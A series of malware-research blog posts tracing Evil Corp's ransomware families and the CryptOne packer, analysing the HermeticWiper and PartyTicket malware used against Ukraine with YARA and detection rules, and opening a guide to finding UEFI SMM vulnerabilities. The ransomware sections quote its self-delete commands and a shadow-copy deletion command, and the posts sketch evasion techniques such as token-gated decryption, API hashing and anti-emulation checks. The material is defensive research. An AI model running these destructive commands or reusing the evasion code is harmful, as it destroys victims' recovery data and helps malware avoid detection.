Again we see the same RSA functions in both families. Both also implement file and directory enumeration logic identically. Comparing the logic and the Control Flow Graph of both routines, we conclude that both ransomware use the same code for file and directory enumeration. We also found similarities between the functions responsible for drive enumeration.

From Hades to Phoenix Locker

In the samples we analyzed, we discovered that Phoenix Locker was a reused and newly-packed Hades payload. Hades and Phoenix samples were compiled at the same time. We confirmed that they reused a ‘clean’ Hades version each time, statically introducing junk code with the help of a script in order to alter the signature. The compiler and linker versions are also the same. This technique of payload reuse was also seen in BitPaymer in order to make the ransomware polymorphic and more evasive.

From Phoenix Locker to PayloadBIN

We observed that the majority of PayloadBIN functions overlap with PhoenixLocker. File enumerating functions are practically identical.

We conducted further similarity analysis by examining the TTPs of the different variants, extracting the main command lines from all of the ransomware families and comparing them. We identified two distinct clusters.

From Hades onwards, we found a unique self-delete implementation including the waitfor command.

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\CenterLibrary\Tip" & del "C:\Users\Admin\AppData\Roaming\CenterLibrary\Tip" & rd "C:\Users\Admin\AppData\Roaming\CenterLibrary\"

This command is not present in WastedLocker, where the choice command is used instead:

cmd /c choice /t 10 /d y & attrib -h "C:\Users\Admin\AppData\Roaming\Wmi" & del "C:\Users\Admin\AppData\Roaming\Wmi"

While the difference in syntax may seem significant, these two implementations are very similar: the logic is the same; only the signature changes.

All of these ransomware variants share the same implementation of shadow copy deletion:

C:\Windows\system32\vssadmin.exe Delete Shadows /All /Quiet

The evidence of this code reuse supports the assessment that it is almost certain these ransomware families are related to the same ‘factory’.

Analysis of the Cypherpunk Variant

A new, possibly experimental, variant dubbed “Cypherpunk” – first reported in June 2021 – was analyzed and linked to the same lineage.

C:\Users\Lucas\Documents\OneNote Notebooks\Personal\
C:\Users\Lucas\Documents\OneNote Notebooks\Personal\CONTACT-TO-DECRYPT.txt
C:\Users\Lucas\Desktop\th (2).jpg.cypherpunk

Code similarity analysis shows that the Cypherpunk version (SHA1 e8d485259e64fd375e03844c03775eda40862e1c) is the same as the previous PayloadBIN variant. It was compiled on 2021-04-01 17:15:24, 20 days after the PayloadBIN sample. It is possible that this is another attempt at rebranding. Although this variant was reported, it was improperly flagged as Hades.

SentinelLabs assesses this new finding is likely an indication that Evil Corp is still working on updating their tradecraft in order to change their signature and stay under the radar.

Evil Corp Pivots to Macaw Locker Ransomware

In October 2021, a new ransomware variant named ‘Macaw Locker’ appeared in the wild, in an attack that began on October 10th against Olympus. A few days later Sinclair Broadcast Group was also attacked, causing widespread disruption. Some researchers claimed a possible connection with WastedLocker, but to date no further details have emerged.

Macaw ransom note

The ransomware features anti-analysis techniques such as API hashing and indirect API calls intended to evade analysis. One aspect that immediately sets Macaw apart is that it requires a custom token, provided via the command line, which appears to be specific to each victim; without it, the ransomware won’t execute.

macaw_sample.exe -k 

The use of a custom token is also seen in Egregor and BlackCat ransomware families, and is a technique used to aid anti-analysis (T1497.002).
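To illustrate the idea behind such token gating (a simplified sketch, not Macaw’s actual scheme), the command-line token can serve as the key that decrypts the embedded payload or configuration, so a sandbox lacking the victim-specific token never recovers executable content:

```javascript
// Illustration only: derive a repeating keystream from the -k token and XOR
// it over the embedded payload. Without the correct token, decryption yields
// garbage and the sample never reaches its real functionality.
function tokenKeystreamXor(data, token) {
    const key = Array.from(token, c => c.charCodeAt(0));
    return Uint8Array.from(data, (b, i) => b ^ key[i % key.length]);
}
```

Because XOR is symmetric, the same function both “encrypts” at build time and “decrypts” at runtime; a real implementation would use a proper cipher and key-derivation step, but the gating effect on analysis is the same.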

Another new addition to Macaw is a special function that acquires the imports for APIs at runtime, instead of when the executable is started via the PE import section. Below, we can see the function that is used before each API call to get its address prior to the call itself.

Macaw function to dynamically fetch addresses

The function gets a 32-bit value that uniquely represents the required API and searches for it through a data structure created beforehand. The data structure can be described as an array with small binary search trees in each of its entries.
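The lookup described above can be sketched as follows. This is a hypothetical illustration of hash-based API resolution, not Macaw's actual implementation: the hash algorithm (a ROR13-style rotate-add, a common choice in malware) and the table layout are assumptions, and a linear search stands in for Macaw's per-bucket binary search trees.

```c
#include <stdint.h>
#include <stddef.h>

/* Toy ROR13-style hash reducing an export name to a 32-bit value.
 * Illustrative only; Macaw's real algorithm is not documented here. */
static uint32_t api_hash(const char *name) {
    uint32_t h = 0;
    while (*name) {
        h = (h >> 13) | (h << 19);   /* rotate right by 13 */
        h += (uint8_t)*name++;
    }
    return h;
}

struct api_entry { uint32_t hash; void *address; };

/* Linear search stands in for the per-bucket binary search trees
 * described above. */
static void *resolve_api(const struct api_entry *table, size_t n,
                         uint32_t hash) {
    for (size_t i = 0; i < n; i++)
        if (table[i].hash == hash)
            return table[i].address;
    return NULL;
}
```

Resolving imports this way leaves no API names in the import directory, which is why each call site must first pass its 32-bit value through a resolver like the one above.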

We assessed the similarity of two core functions between Hades and Macaw. In both strains, the implementation is the same. The only minor differences stem from the imports fetched at runtime.

CryptOne: One Packer To Rule Them All

CryptOne (also known as HellowinPacker) was a special packer used by Evil Corp up until mid-2021.

CryptOne appears to have first been noticed in 2015. Early versions were used by an assortment of different malware families such as NetWalker, Gozi, Dridex, Hancitor and Zloader. In 2019, Bromium analyzed and reported it as in use by Emotet. In June 2020, NCC Group reported that CryptOne was used to pack WastedLocker. In 2021, researchers observed CryptOne being advertised as a Packer-as-a-Service on various crime-oriented forums.

CryptOne has the following characteristics and features:

  • Sandbox evasion with the GetInputState() or GetKeyState() API;
  • Anti-emulation with UCOMIEnumConnections and the IActiveScriptParseProcedure32 interface;
  • Code-flow obfuscation;

We created a static unpacker, de-CryptOne, which unpacks both x86 and x64 samples. It outputs two files:

  1. the shellcode responsible for unpacking
  2. the unpacked sample.

We collected CryptOne packed samples, and with the use of the above tool, unpacked and categorized them at scale.

Unpacking CryptOne

CryptOne’s unpacking method consists of two stages:

  1. The packer decrypts and executes the embedded shellcode.
  2. The shellcode decrypts and executes the embedded executable.

CryptOne gets chunks of the encrypted data, which are separated by junk.

CryptOne junk data

Example Memory Dump:

  • 0x5EE00, Encrypted size
  • 0x4011CA, Address of encrypted data
  • 0x4D/”M”, Junk data
  • 0x14, Junk size
  • 0x7A, Chunk Size

After removal of the junk data, the decryption starts with a simple XOR-Key which increases by 0x4 in each round. The initial XOR-Key is 0xA113.

CryptOne XOR Key
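The rolling-XOR layer described above can be sketched as follows. The initial key 0xA113 and the per-round increment of 0x4 come from the analysis; applying the key per 32-bit dword is an assumption made for illustration. Because XOR is symmetric, the same routine both encrypts and decrypts.

```c
#include <stdint.h>
#include <stddef.h>

/* Sketch of CryptOne's rolling XOR: initial key 0xA113, incremented by
 * 0x4 each round. Dword granularity is assumed, not confirmed. */
static void cryptone_xor(uint32_t *buf, size_t ndwords) {
    uint32_t key = 0xA113;
    for (size_t i = 0; i < ndwords; i++) {
        buf[i] ^= key;
        key += 0x4;
    }
}
```

Running the routine twice over the same buffer round-trips the data, which is also why a static unpacker like de-CryptOne only needs to reimplement this one loop.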

Once the shellcode is decrypted, we can partially observe the string “This program cannot be run in DOS mode”, indicating that the data contains an executable which requires a second round of decryption.

CryptOne partially decrypted shellcode

Using a decryption routine similar to the previous one, the shellcode then decrypts the embedded binary.

Fastcall Shellcode XOR

The shellcode allocates and copies the encrypted executable and starts the decryption loop; once it finishes, it jumps to the EntryPoint and executes the unpacked sample.

CryptOne executing the unpacked sample

At this stage we can observe strings related to the unpacked sample.

CryptOne embedded strings after unpacking

A Unique Factory

Hunting for CryptOne led us to identify different implementations of the stub, some of which have never been reported previously. Each version is identified by a certain signature, listed below:

  • 111111111\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}
  • 1nterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • 444erfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • 555erfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • 5nterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • 987erfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • Interfac4\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • InterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • aaaerfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • interfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • rrrerfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}

The first part of the string is composed of a custom string (111111111, 1nterfacE, 444erfacE,…) which is replaced at runtime by the ‘interface’ keyword to reconstruct the registry key.


The registry keys are related to the UCOMIEnumConnections and IActiveScriptParseProcedure32 interfaces respectively.

Once executed, the cryptor checks for the presence of those keys before loading the next stage payload. If it does not find the keys, then the malware goes into an endless loop without doing anything as an anti-emulation technique. This works because some emulators do not implement the full Windows registry.
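A minimal simulation of this anti-emulation check is sketched below. The registry lookup is stubbed out so the sketch stays runnable and portable; a real sample would call RegOpenKeyExW on the reconstructed key and spin in an endless loop on failure instead of returning. The GUID string comes from the interface keys listed above; everything else is illustrative.

```c
#include <stdbool.h>
#include <string.h>

/* Stub standing in for RegOpenKeyExW: pretend only the genuine
 * interface keys (present on real Windows installs, often missing in
 * emulators) exist. */
static bool registry_key_exists(const char *path) {
    return strstr(path, "{b196b287-bab4-101a-b69c-00aa00341d07}") != NULL;
}

/* Returns true if the stub would proceed to unpack the payload, false
 * if it concludes it is running under an emulator. The real packer
 * loops forever in the latter case rather than returning. */
static bool cryptone_environment_ok(void) {
    return registry_key_exists(
        "Interface\\{b196b287-bab4-101a-b69c-00aa00341d07}");
}
```

An emulator whose registry implementation lacks these obscure-but-real interface keys fails the lookup, so the payload never decrypts.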

In reviewing two different versions of CryptOne, we noticed that in order to update the signature, the actor needs to re-compile the cryptor, as the cryptor implementation changes between versions.

CryptOne Timeline

Our analysis shows that Evil Corp likely became a customer of the CryptOne service in March 2020. From March to May 2020, we found that WastedLocker, gozi_rm3 (version:3.00 build:854) and Dridex (10121) samples were all packed and compiled in the same timeframe using the same CryptOne stub signature (InterfacE).

For a limited period of time between May 2020 and August 2020, we observed overlaps between different versions of CryptOne.

CryptOne overlaps between May 2020 and August 2020

It seems that from a specific point in time, around September 2020, Hades, PhoenixLocker and PayloadBIN started adopting a specific CryptOne stub identified by the signature:


From December 2020, the CryptOne version ‘111111111’ appeared in the wild without any overlap.


Clustering Evil Corp activity is demonstrably difficult considering that the group has changed TTPs several times in order to bypass sanctions and stay under the radar. This is in addition to the overall trend of actors receding back into secrecy. In this research, we connect the dots in the Evil Corp ecosystem, cluster Evil Corp malware, document the group’s activities and provide insight into their TTPs.

SentinelLabs assesses with high confidence that WastedLocker, Hades, PhoenixLocker, Macaw Locker and PayloadBIN belong to the same cluster. Our assessment is based on code similarity and reuse, timeline consistency and nearly identical TTPs across the ransomware families indicating there is a consistent modus operandi for the cluster. In addition, we assess that there is a likely evolutionary link between WastedLocker and BitPaymer, and suggest that it can be attributed to the same Evil Corp activity cluster.

We fully expect that Evil Corp will continue to evolve and target organizations. In addition, we assess it is likely they will also continue to advance their tradecraft, finding new methods of evading detection and misleading attribution. SentinelLabs will continue tracking this activity cluster to provide insight into its evolution.

In-depth technical analysis, Indicators of Compromise and further technical references are available in the full report.

Read the Full Report

HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine

24 February 2022 at 05:40

This post was updated Feb 28th 2022 to include new IOCs and the PartyTicket ‘decoy ransomware’.

Executive Summary

  • On February 23rd, the threat intelligence community began observing a new wiper malware sample circulating in Ukrainian organizations.
  • Our analysis shows a signed driver is being used to deploy a wiper that targets Windows devices, manipulating the MBR and resulting in subsequent boot failure.
  • This blog includes the technical details of the wiper, dubbed HermeticWiper, and includes IOCs to allow organizations to stay protected from this attack.
  • This sample is actively being used against Ukrainian organizations, and this blog will be updated as more information becomes available.
  • We also analyze a ‘ransomware’, called PartyTicket, reportedly used as a decoy during wiping operations.
  • SentinelOne customers are protected from this threat, no action is needed.


On February 23rd, our friends at Symantec and ESET research tweeted hashes associated with a wiper attack in Ukraine, including one which is not publicly available as of this writing.

We started analyzing this new wiper malware, calling it ‘HermeticWiper’ in reference to the digital certificate used to sign the sample. The digital certificate is issued under the company name ‘Hermetica Digital Ltd’ and valid as of April 2021. At this time, we haven’t seen any legitimate files signed with this certificate. It’s possible that the attackers used a shell company or appropriated a defunct company to issue this digital certificate.

HermeticWiper Digital Signature

This is an early effort to analyze the first available sample of HermeticWiper. We recognize that the situation on the ground in Ukraine is evolving rapidly and hope that we can contribute our small part to the collective analysis effort.

Technical Analysis

At first glance, HermeticWiper appears to be a custom-written application with very few standard functions. The malware sample is 114KB in size and roughly 70% of that is composed of resources. The developers are using a tried and tested technique of wiper malware, abusing a benign partition management driver, in order to carry out the more damaging components of their attacks. Both the Lazarus Group (Destover) and APT33 (Shamoon) took advantage of EldoS RawDisk in order to get direct userland access to the filesystem without calling Windows APIs. HermeticWiper uses a similar technique by abusing a different driver, empntdrv.sys.

HermeticWiper resources containing EaseUS Partition Manager drivers

The copies of the driver are ms-compressed resources. The malware deploys one of these depending on the OS version, bitness, and SysWow64 redirection.

EaseUS driver resource selection

The benign EaseUS driver is abused to do a fair share of the heavy-lifting when it comes to accessing Physical Drives directly as well as getting partition information. This adds to the difficulty of analyzing HermeticWiper, as a lot of functionality is deferred to DeviceIoControl calls with specific IOCTLs.

MBR and Partition Corruption

HermeticWiper enumerates a range of Physical Drives multiple times, from 0-100. For each Physical Drive, the \\.\EPMNTDRV\ device is called for a device number.

The malware then focuses on corrupting the first 512 bytes, the Master Boot Record (MBR) for every Physical Drive. While that should be enough for the device not to boot again, HermeticWiper proceeds to enumerate the partitions for all possible drives.
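The reason corrupting just those first 512 bytes is enough to prevent booting can be illustrated with a small checker. BIOS firmware refuses to boot a disk whose first sector lacks the 0x55AA signature at offset 510; this sketch is a simplification and only models that one check, not the partition table parsing that follows it.

```c
#include <stdint.h>
#include <stdbool.h>

#define SECTOR_SIZE 512

/* The MBR is the first 512-byte sector of a physical drive. Legacy
 * firmware checks for the 0x55AA signature in its last two bytes
 * before transferring control, so destroying the sector alone makes
 * the disk unbootable. */
static bool mbr_is_bootable(const uint8_t sector[SECTOR_SIZE]) {
    return sector[510] == 0x55 && sector[511] == 0xAA;
}
```

Overwriting the sector with random bytes, as a wiper does, almost certainly destroys this signature along with the partition table embedded in the same sector.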

The malware then differentiates between FAT and NTFS partitions. In the case of a FAT partition, the malware calls the same ‘bit fiddler’ to corrupt the partition. For NTFS, HermeticWiper parses the Master File Table before calling this same bit fiddling function again.

MFT parsing and bit fiddling calls

We euphemistically refer to the bit fiddling function in the interest of brevity. Looking through it, we see calls to Windows APIs to acquire a cryptographic context provider and generate random bytes. It’s likely this is being used for an inlined crypto implementation and byte overwriting, but the mechanism isn’t entirely clear at this time.

Further functionality refers to interesting MFT fields ($bitmap, $logfile) and NTFS streams ($DATA, $I30, $INDEX_ALLOCATION). The malware also enumerates common folders (‘My Documents’, ‘Desktop’, ‘AppData’), makes references to the registry (‘ntuser’), and Windows Event Logs ("\\\\?\\C:\\Windows\\System32\\winevt\\Logs"). Our analysis is ongoing to determine how this functionality is being used, but it is clear that having already corrupted the MBR and partitions for all drives, the victim system should be inoperable by this point of the execution.

Along the way, HermeticWiper’s more mundane operations provide us with further IOCs to monitor for. These include the momentary creation of the abused driver as well as a system service. It also modifies several registry keys, including setting the SYSTEM\CurrentControlSet\Control\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver’s execution starts.

Disabling CrashDumps via the registry

Finally, the malware waits on sleeping threads before initiating a system shutdown, finalizing the malware’s devastating effect.

A Decoy Ransomware – PartyTicket

On February 24th, 2022, Symantec researchers pointed to a new Go ransomware being used as a decoy alongside the deployment of HermeticWiper. During our analysis we decided to name it PartyTicket based on some of the strings used by the malware developers:

The idea of using a ransomware as a decoy for a wiper is counterintuitive. In particular, a ransomware as poorly coded as PartyTicket is more likely to tie up resources during the execution of an otherwise efficient wiper.

As often happens to amateur Go developers, the malware has poor control over its concurrent threads and the commands it attempts to run. This leads to hundreds of threads and events spawned in our consoles. That is to say, it’s a very loud and ineffective ransomware that should fire alerts left and right.

The folder organization and function naming conventions within the binary show the developer’s intent for taunting the U.S. Government and the Biden administration.

Project folders and function names referring to the Biden Administration

Similar taunting can be found in the ransom note after execution:

In trying to understand the execution flow of PartyTicket, we see the 403forBiden.wHiteHousE.primaryElectionProcess() function recursively enumerating folders:

PartyTicket looping over non-system folders

The resulting number of folders is used as an upper bound for the number of concurrent threads, a mistake by the Go developers as that effectively ties up all of the system’s resources. Meanwhile, the files found are all queued into a channel for the threads to reference.

PartyTicket generating concurrent threads

The function indirectly called for each thread is main.subscribeNewPartyMember(). It in turn takes a filename, makes a copy with a <UUID>.exe name and deletes the original file. Then we expect a second loop to relieve that queue of files and run each through a standard Go AES crypto implementation. However, execution is unlikely to get this far with the current design of PartyTicket.

(Thanks to Joakim Kennedy (Intezer) for pointing out this indirect call)

Crypto routine for files queued in the ‘salary’ channel

Overall our analysis of PartyTicket indicates it to be a rather simple, poorly coded, and loud malware. Its possible role as a decoy ransomware deployed alongside HermeticWiper is more likely to be effective for its accidental hogging of the victim organization’s system resources rather than the encryption of files itself. IOCs and Yara rules have been added below.


After a week of defacements and increasing DDoS attacks, the proliferation of sabotage operations through wiper malware is an expected and regrettable escalation. At this time, we have a very small sliver of aperture into the attacks in Ukraine and subsequent spillover into neighboring countries and allies. If there’s a silver lining to such a difficult situation, it’s seeing the open collaboration between threat intel research teams, independent researchers, and journalists looking to get the story straight. Our thanks to the researchers at Symantec, ESET, Stairwell, and RedCanary among others who’ve contributed samples, time, and expertise.

SentinelOne Customers Protected

Indicators of Compromise

(Updated February 28th, 2022)

ms-compressed resources SHA1
RCDATA_DRV_X64 5ceebaf1cbb0c10b95f7edd458804a646c6f215e
RCDATA_DRV_X86 0231721ef4e4519ec776ff7d1f25c937545ce9f4
RCDATA_DRV_XP_X64 9c2e465e8dfdfc1c0c472e0a34a7614d796294af
RCDATA_DRV_XP_X86 ee764632adedf6bb4cf4075a20b4f6a79b8f94c0
HermeticWiper SHA1
Win32 EXE 0d8cc992f279ec45e8b8dfd05a700ff1f0437f29
Win32 EXE 61b25d11392172e587d8da3045812a66c3385451
Win32 EXE 912342f1c840a42f6b74132f8a7c4ffe7d40fb77
Win32 EXE 9518e4ae0862ae871cf9fb634b50b07c66a2c379
Win32 EXE d9a3596af0463797df4ff25b7999184946e3bfa2
PartyTicket SHA-1
Win32 EXE f32d791ec9e6385a91b45942c230f52aff1626df

YARA Rules


import "pe"

rule HermeticWiper
{
    meta:
      desc = "Hermetic Wiper - broad hunting rule"
      author = "Hegel @ SentinelLabs"
      version = "1.0"
      last_modified = "02.23.2022"
      hash = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
      reference = ""
    strings:
        $string1 = "DRV_XP_X64" wide ascii nocase
        $string2 = "EPMNTDRV\\%u" wide ascii nocase
        $string3 = "PhysicalDrive%u" wide ascii nocase
        $cert1 = "Hermetica Digital Ltd" wide ascii nocase
    condition:
      uint16(0) == 0x5A4D and
      all of them
}

rule PartyTicket
{
    meta:
      desc = "PartyTicket / HermeticRansom Golang Ransomware - associated with HermeticWiper campaign"
      author = "Hegel @ SentinelLabs"
      version = "1.0"
      last_modified = "02.24.2022"
      hash = "4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382"
      reference = ""
    strings:
        $string1 = "/403forBiden/" wide ascii nocase
        $string2 = "/wHiteHousE/" wide ascii
        $string3 = "vote_result." wide ascii
        $string4 = "partyTicket." wide ascii
        $buildid1 = "Go build ID: \"qb0H7AdWAYDzfMA1J80B/nJ9FF8fupJl4qnE4WvA5/PWkwEJfKUrRbYN59_Jba/2o0VIyvqINFbLsDsFyL2\"" wide ascii
        $project1 = "C:/projects/403forBiden/wHiteHousE/" wide ascii
    condition:
      uint16(0) == 0x5A4D and
      (2 of ($string*) or
        any of ($buildid*) or
        any of ($project*))
}

rule Hermetica_Cert
{
    meta:
      desc = "Hermetica Cert - broad hunting rule based on the certificate used in HermeticWiper and HermeticWizard"
      author = "Hegel @ SentinelLabs"
      version = "1.0"
      last_modified = "03.01.2022"
      hash = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
      reference = ""
    condition:
      uint16(0) == 0x5a4d and
      for any i in (0 .. pe.number_of_signatures) : (
         pe.signatures[i].issuer contains "DigiCert EV Code Signing CA" and
         pe.signatures[i].serial == "0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec"
      )
}

rule IsaacWiper
{
    meta:
      desc = "IsaacWiper - broad hunting rule"
      author = "Hegel @ SentinelLabs"
      version = "1.0"
      last_modified = "03.01.2022"
      hash = "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033"
      reference = ""
    strings:
        $name1 = "Cleaner.dll" wide ascii
        $name2 = "cl.exe" wide ascii nocase
        $name3 = "cl64.dll" wide ascii nocase
        $name4 = "cld.dll" wide ascii nocase
        $name5 = "cll.dll" wide ascii nocase
        $name6 = "Cleaner.exe" wide ascii
        $export = "[email protected]" wide ascii
    condition:
      uint16(0) == 0x5A4D and
      (any of ($name*) and $export)
}

rule HermeticWizard
{
    meta:
      desc = "HermeticWizard hunting rule"
      author = "Hegel @ SentinelLabs"
      version = "1.0"
      last_modified = "03.01.2022"
      reference = ""
    strings:
        $name1 = "Wizard.dll" wide ascii
        $name2 = "romance.dll" wide ascii
        $name3 = "exec_32.dll" wide ascii
        $function1 = "DNSGetCacheDataTable" wide ascii
        $function2 = "GetIpNetTable" wide ascii
        $function3 = "WNetOpenEnumW" wide ascii
        $function4 = "NetServerEnum" wide ascii
        $function5 = "GetTcpTable" wide ascii
        $function6 = "GetAdaptersAddresses" wide ascii
        $function7 = "GetEnvironmentStrings" wide ascii
        $ip_anchor1 = "" wide ascii
    condition:
      uint16(0) == 0x5A4D and
      (any of ($function*) and any of ($name*) and $ip_anchor1)
}

SentinelOne STAR Rules

EventType = "Process Creation" AND TgtProcPublisher = "HERMETICA DIGITAL LTD"  AND
( SrcProcSignedStatus = "signed" AND IndicatorPersistenceCount = "2"  AND RegistryValue = "4" AND RegistryKeyPath = "MACHINE\SYSTEM\ControlSet001\Services\VSS\Start" ) AND SrcProcImagePath !~ "devsetup64.exe"

Zen and the Art of SMM Bug Hunting | Finding, Mitigating and Detecting UEFI Vulnerabilities

3 March 2022 at 16:51

It’s been almost a full year since we published the last part of our UEFI blog posts series. During that period, the firmware security community has been more active than ever, producing several high-quality publications. Notable examples include the discovery of new UEFI implants such as MoonBounce and ESPecter, and the recent disclosure of no less than 23 high-severity BIOS vulnerabilities by Binarly.

Here at SentinelOne, we haven’t been sitting idle either. In the past year, we tried our hand at hunting down and exploiting SMM vulnerabilities. After spending several months doing so, we noticed some repetitive anti-patterns in SMM code and developed a pretty good intuition regarding the potential exploitability of bugs. Eventually, we concluded 2021 having disclosed 13 such vulnerabilities, affecting most of the well-known OEMs in the industry. In addition, several more vulnerabilities are still moving through the responsible disclosure pipeline and should go public soon.

In this blog post, we would like to share the knowledge, tools, and methods we developed to help uncover these SMM vulnerabilities. We hope that by the time you finish reading this article, you too will be able to find such firmware vulnerabilities yourselves. Please note that this article assumes a solid knowledge of SMM terminology and internals, so if your memory needs a refresher we highly recommend reading the articles in the Further Reading section before proceeding. And now, let’s get started.

Classes of SMM Vulnerabilities

While in theory SMM code is isolated from the outside world, in reality, there are many circumstances in which non-SMM code can trigger and even affect code running inside SMM. Because SMM has a complex architecture with lots of “moving parts” in it, the attack surface is pretty vast and contains among other things data passed in communication buffers, NVRAM variables, DMA-capable devices, and so on.

In the following section, we will go through some of the more common SMM security vulnerabilities. For each vulnerability type, we will provide a brief description, some recommended mitigations as well as a strategy for detecting it while reversing. Note that the list of vulnerabilities is not exhaustive and contains only vulnerabilities that are specific to the SMM environment. For that reason, it will not include more generic bugs such as stack overflows and double-frees.

SMM Callouts

The most basic SMM vulnerability class is known as an “SMM callout”. This occurs whenever SMM code calls a function located outside of the SMRAM boundaries (as defined by the SMRRs). The most common callout scenario is an SMI handler that tries to invoke a UEFI boot service or runtime service as part of its operation. Attackers with OS-level privileges can modify the physical pages where these services live prior to triggering the SMI, thus hijacking the privileged execution flow once the affected service is called.

Figure 1 – Schematic overview of an SMM callout, source: CanSecWest 2015
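The hijack can be modeled with a few lines of C. This is a deliberately minimal simulation, not real EDK2 code: the "boot service" pointer lives in ordinary, attacker-writable memory (our stand-in for RAM outside SMRAM), so replacing it before triggering the SMI redirects the privileged call. All names here are illustrative.

```c
/* Minimal model of an SMM callout. */
typedef int (*service_fn)(void);

static int legit_service(void)  { return 0;  }
static int attacker_stub(void)  { return 42; }   /* attacker-controlled code */

/* Global service table pointer in "normal" RAM, as gBS would be;
 * OS-level code can overwrite it at will. */
static service_fn g_boot_service = legit_service;

/* Faulty SMI handler: calls out of SMRAM through the swappable pointer,
 * so it executes whatever the attacker planted there, with SMM
 * privileges. */
static int smi_handler_with_callout(void) {
    return g_boot_service();
}
```

This is exactly the execution pattern SMM_Code_Chk_En is designed to trap in hardware: once in SMM, any fetch from outside the SMRR-defined region faults instead of executing.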


Besides the obvious approach of not writing such faulty code in the first place, SMM callouts can also be mitigated at the hardware level. Starting from the 4th generation of the Core microarchitecture (Haswell), Intel CPUs support a security feature called SMM_Code_Chk_En. If this security feature is turned on, the CPU is prohibited from executing any code located outside the SMRAM region once it enters SMM. One can think of this feature as the SMM equivalent of Supervisor Mode Execution Prevention (SMEP).

Querying for the status of this mitigation can be done by executing the smm_code_chk module from CHIPSEC.

Figure 2 – Using chipsec to query for the hardware mitigation against SMM callouts


Static detection of SMM callouts is pretty straightforward. Given an SMM binary, we should analyze it while looking for SMI handlers that have some execution flow that leads to calling a UEFI boot or runtime service. This way, the problem of finding SMM callouts is reduced to the problem of searching the call graph for certain paths. Luckily for us, no additional effort is required at all since this heuristic is already implemented by the excellent efiXplorer IDA plugin.

As we mentioned in previous posts in the series, efiXplorer is a one-stop-shop and serves as the de-facto standard way of analyzing UEFI binaries with IDA. Among other things, it takes care of the following:

  • Locating and renaming known UEFI GUIDs
  • Locating and renaming SMI handlers
  • Locating and renaming UEFI boot/runtime services
  • Recent versions of efiXplorer use the Hex-Rays decompiler to improve analysis. One such feature is the ability to assign the correct type to interface pointers passed to methods such as LocateProtocol() or its SMM counterpart SmmLocateProtocol().

A note to Ghidra users: We also want to add that the Ghidra plugin efiSeek takes care of all the changes in the list above. However, it doesn’t include the UI elements like the protocols window and the vulnerability detection capabilities offered by efiXplorer.

After analysis of the input file is complete, efiXplorer will move on to inspect all calls carried out by SMI handlers, which yields a curated listing of potential callouts:

Figure 3 – Callouts found by efiXplorer
Figure 4 – sub_7F8 is reachable from an SMI handler but still calls a boot service located outside of SMRAM

For the most part, this heuristic works great, but we’ve encountered several edge cases where it might generate some false positives as well. The most common one is caused due to the usage of EFI_SMM_RUNTIME_SERVICES_TABLE. This is a UEFI configuration table that exposes the exact same functionality as the standard EFI_RUNTIME_SERVICES_TABLE, with the only significant difference being that, unlike its “standard” counterpart, it resides in SMRAM and is therefore suitable to be consumed by SMI handlers. Many SMM binaries often re-map the global RuntimeServices pointer to the SMM-specific implementation after completing some boilerplate initialization tasks:

Figure 5 – Remapping the global RuntimeService pointer to the SMM-compatible implementation

Calling runtime services via the re-mapped pointer yields a situation that appears to be a callout at first glance, though a closer examination will prove otherwise. To overcome this, analysts should always search the SMM binary for the GUID identifying EFI_SMM_RUNTIME_SERVICES_TABLE. If this GUID is found, chances are that most of the callouts involving UEFI runtime services are false positives. This does not apply to callouts involving boot services, though.

Figure 6 – A false positive caused by calling GetVariable() via the re-mapped RuntimeService pointer

Another source of potential false positives is various wrapper functions which are “dual-mode”, meaning they can be called from both SMM and non-SMM contexts. Internally, these functions dispatch a call to an SMM service if the caller is executing in SMM, and dispatch a call to the equivalent boot/runtime service otherwise. The most common example we’ve seen in the wild is FreePool() from EDK2, which calls gSmst->SmmFreePool() if the buffer to be freed resides in SMRAM, or calls gBs->FreePool() otherwise.

Figure 7 – The FreePool() utility function from EDK2 is a common source of false positives

As this example demonstrates, bug hunters should be aware of the fact that static code analysis techniques have a hard time determining that certain code paths won’t be executed in practice, and as such are likely to flag this as a callout. Some tips and tricks for identifying this function in compiled binaries will be conveyed in the Identifying Library Functions section.

Low SMRAM Corruption


Under normal circumstances, the communication buffer used to pass arguments to the SMI handler must not overlap with SMRAM. The rationale for this restriction is quite simple: if that wasn’t the case, any time the SMI handler would write some data into the comm buffer — for example, in order to return a status code to the caller — it would also modify some portion of SMRAM along the way, which is undesirable.

Figure 8 – This situation should not occur

In EDK2, the function responsible for checking whether or not a given buffer overlaps with SMRAM is called SmmIsBufferOutsideSmmValid(). This function gets called on the communication buffer upon each SMI invocation in order to enforce this restriction.

Figure 9 – EDK2 forbids the comm buffer from overlapping with SMRAM
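The core of that check boils down to a range-overlap test, sketched below. This is a simplified reimplementation of the concept, not EDK2's actual SmmIsBufferOutsideSmmValid(): it assumes a single SMRAM descriptor with made-up base and size, whereas EDK2 walks a list of descriptors. The overflow test mirrors EDK2's rejection of wrap-around buffers.

```c
#include <stdint.h>
#include <stdbool.h>

/* Made-up SMRAM range for illustration. */
#define SMRAM_BASE 0x70000000ULL
#define SMRAM_SIZE 0x00800000ULL

/* Returns true only if [addr, addr+size) does not intersect SMRAM. */
static bool buffer_outside_smram(uint64_t addr, uint64_t size) {
    if (size == 0 || addr + size < addr)    /* reject wrap-around */
        return false;
    return addr + size <= SMRAM_BASE ||
           addr >= SMRAM_BASE + SMRAM_SIZE;
}
```

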